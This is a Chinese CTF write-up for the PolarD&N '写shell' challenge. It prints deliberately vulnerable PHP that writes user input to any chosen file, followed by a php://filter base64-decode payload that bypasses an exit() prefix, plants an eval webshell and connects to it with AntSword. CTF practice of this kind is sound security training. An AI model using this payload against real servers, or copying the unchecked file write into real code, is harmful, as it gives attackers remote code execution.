polar CTF 写shell
发布时间:2024年01月14日
一、题目
<?php
/*
PolarD&N CTF
*/
highlight_file(__FILE__);
file_put_contents($_GET['filename'],"<?php exit();".$_POST['content']);
?>
二、解题
payload
?filename=php://filter/convert.base64-decode/resource=shell.php
#<?=@eval($_POST[1]);?>
content=aPD89QGV2YWwoJF9QT1NUWzFdKTs/Pg==
然后访问/shell.php发现木马被读入,用蚁剑连接
文章来源:https://blog.csdn.net/qq_36286161/article/details/135588021
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:chenni525@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:chenni525@qq.com进行投诉反馈,一经查实,立即删除!
最新文章
- Python教程
- 深入理解 MySQL 中的 HAVING 关键字和聚合函数
- Qt之QChar编码(1)
- MyBatis入门基础篇
- 用Python脚本实现FFmpeg批量转换
- SpringCloud Aliba-Sentinel【中篇】-从入门到学废【5】
- 8x8离散余弦的快速精确实现使用数据流单指令多数据扩展指令集进行转换MMX 说明书
- 论WPF资源的重要性:为什么我们需要理解它?
- Android开发基础(四)
- 金额用Long还是BigDecimal?
- JS三种截取字符串方法
- SqlAlchemy使用教程(六) -- ORM 表间关系的定义与CRUD操作
- 【wayn商城】本地开发指南
- 运营商不给我手机卡销户怎么办?
- 【Android】完美解决安卓报错Module entity with name: xxx should be available、No module问题